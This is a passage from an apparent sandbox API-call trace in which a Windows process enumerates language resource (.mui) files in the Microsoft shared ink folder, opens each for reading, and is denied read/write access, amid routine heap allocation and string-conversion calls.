HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0098.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0098.745] AreFileApisANSI () returned 1 [0098.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui", lpUsedDefaultChar=0x0) returned 85 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0098.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.745] AreFileApisANSI () returned 1 [0098.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0098.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81358 [0098.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 85 [0098.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.746] GetFileType (hFile=0x27c) returned 0x1 [0098.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.746] CloseHandle (hObject=0x27c) returned 1 [0098.746] AreFileApisANSI () returned 1 [0098.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x80fc0 [0098.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x80fc0, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 85 [0098.747] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.747] GetLastError () returned 0x5 [0098.747] GetLastError () returned 0x5 [0098.747] SetLastError (dwErrCode=0x5) [0098.747] GetLastError () returned 0x5 [0098.747] SetLastError (dwErrCode=0x5) [0098.747] GetLastError () returned 0x5 [0098.747] SetLastError (dwErrCode=0x5) [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0098.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.747] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dab1374, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.747] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0098.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0098.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.748] AreFileApisANSI () returned 1 [0098.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0098.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.748] AreFileApisANSI () returned 1 [0098.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0098.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 72 [0098.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.749] GetFileType (hFile=0x27c) returned 0x1 [0098.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0098.749] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.749] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.749] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.749] CloseHandle (hObject=0x27c) returned 1 [0098.749] AreFileApisANSI () returned 1 [0098.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0098.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0098.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 72 [0098.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.901] GetLastError () returned 0x5 [0098.901] GetLastError () returned 0x5 [0098.901] SetLastError (dwErrCode=0x5) [0098.901] GetLastError () returned 0x5 [0098.901] SetLastError (dwErrCode=0x5) [0098.901] GetLastError () returned 0x5 [0098.901] SetLastError (dwErrCode=0x5) [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0098.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.901] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9f27a8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69030 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69030 | out: hHeap=0x20000) returned 1 [0098.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x816f0 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0098.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.902] AreFileApisANSI () returned 1 [0098.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui", lpUsedDefaultChar=0x0) returned 86 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0098.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.902] AreFileApisANSI () returned 1 [0098.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0098.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81a88 [0098.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81a88, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 86 [0098.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.903] GetFileType (hFile=0x418) returned 0x1 [0098.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0098.903] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.904] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.904] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.904] CloseHandle (hObject=0x418) returned 1 [0098.904] AreFileApisANSI () returned 1 [0098.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0098.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81580 [0098.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81580, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 86 [0098.905] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.905] GetLastError () returned 0x5 [0098.905] GetLastError () returned 0x5 [0098.905] SetLastError (dwErrCode=0x5) [0098.905] GetLastError () returned 0x5 [0098.905] SetLastError (dwErrCode=0x5) [0098.905] GetLastError () returned 0x5 [0098.905] SetLastError (dwErrCode=0x5) [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0098.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.905] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9f27a8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.905] RtlAllocateHeap 